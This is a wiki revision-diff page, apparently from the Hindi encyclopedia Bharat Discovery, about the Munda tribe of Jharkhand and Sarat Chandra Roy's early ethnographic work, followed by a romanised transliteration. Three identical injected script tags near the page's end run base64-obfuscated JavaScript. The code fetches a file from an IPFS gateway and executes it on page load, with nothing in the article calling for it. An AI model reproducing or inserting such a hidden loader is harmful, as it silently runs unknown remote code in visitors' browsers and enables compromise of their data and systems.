Difference between revisions of "मुण्डा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " रुप " to " रूप ")
 
Line 1: Line 1:
मुण्डा [[भारत]] की एक प्रमुख जनजाति हैं। मुण्डा [[झारखण्ड]] प्रदेश की एक प्रमुख आदिवासी है। इस जनजाति का मूल स्थान दक्षिणी छोटा नागपुर है, हालांकि उत्तरी छोटा नागपुर में भी ये कहीं-कहीं मिल जाते हैं। मुण्डा जाति पर सर्वप्रथम राय बहादुर शरत चन्द्र राय ने सर्वाधिक महत्त्वपूर्ण और प्रमाणिक कार्य किया। सन् 1912 में मुण्डा बोली बोलने वालों के इतिहास पर उन्होंने कार्य किया। उसके बाद अन्य जातियों जैसे बिरहोर (1925) खरिया (1937, अपने पुत्र के साथ) और दो विवरण द्रविड़ियन भाषा बोलने वाले उरांव (1915, 1928) और एक इण्डो-यूरोपियन बोली बोलने वाले उत्तर-पश्चिमी [[उड़ीसा]] (1935) पर उन्होंने अपना मूल और तथ्यपरक रिपोर्ट पुस्तकाकार रूप में प्रकाशित किया। उनका दूसरा महत्त्वपूर्ण योगदान है 'मेन इन इण्डिया नामक शोध जनरल' का प्रकाशन वह भी रांची जैसे छोटे जगह से।
+
'''मुण्डा''' [[भारत]] की प्रमुख जनजातियों में गिनी जाती है। यह [[झारखण्ड]] प्रदेश की एक प्रमुख आदिवासी जनजाति है। इस जनजाति का मूल स्थान दक्षिणी [[छोटा नागपुर]] है, हालांकि उत्तरी छोटा नागपुर में भी ये कहीं-कहीं मिल जाते हैं।
  
{{प्रचार}}
+
*मुण्डा जाति पर सर्वप्रथम रायबहादुर शरत चन्द्रराय ने सर्वाधिक महत्त्वपूर्ण और प्रमाणिक कार्य किया था।
{{लेख प्रगति
+
*सन [[1912]] में मुण्डा बोली बोलने वालों के [[इतिहास]] पर रायबहादुर जी ने कार्य किया। उसके बाद अन्य जातियों, जैसे- बिरहोर ([[1925]]), खरिया ([[1937]], अपने पुत्र के साथ) और दो विवरण द्रविड़ियन भाषा बोलने वाले [[उरांव जाति|उरांव]] ([[1915]], [[1928]]) और एक इण्डो-यूरोपियन बोली बोलने वाले उत्तर-पश्चिमी [[उड़ीसा]] ([[1935]]) पर उन्होंने अपनी मूल और तथ्यपरक रिपोर्ट पुस्तकाकार रूप में प्रकाशित की। उनका दूसरा महत्त्वपूर्ण योगदान है 'मेन इन इण्डिया' नामक शोध जनरल का प्रकाशन। वह भी [[रांची]] जैसे छोटे जगह से हुआ था।
|आधार=
+
 
|प्रारम्भिक=प्रारम्भिक1
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{जातियाँ और जन जातियाँ}}
 
{{जातियाँ और जन जातियाँ}}

Latest revision as of 14:18, 28 September 2012

munda bharat ki pramukh janajatiyoan mean gini jati hai. yah jharakhand pradesh ki ek pramukh adivasi janajati hai. is janajati ka mool sthan dakshini chhota nagapur hai, halaanki uttari chhota nagapur mean bhi ye kahian-kahian mil jate haian.

  • munda jati par sarvapratham rayabahadur sharat chandraray ne sarvadhik mahattvapoorn aur pramanik kary kiya tha.
  • san 1912 mean munda boli bolane valoan ke itihas par rayabahadur ji ne kary kiya. usake bad any jatiyoan, jaise- birahor (1925), khariya (1937, apane putr ke sath) aur do vivaran dravi diyan bhasha bolane vale uraanv (1915, 1928) aur ek indo-yooropiyan boli bolane vale uttar-pashchimi u disa (1935) par unhoanne apani mool aur tathyaparak riport pustakakar roop mean prakashit ki. unaka doosara mahattvapoorn yogadan hai 'men in indiya' namak shodh janaral ka prakashan. vah bhi raanchi jaise chhote jagah se hua tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>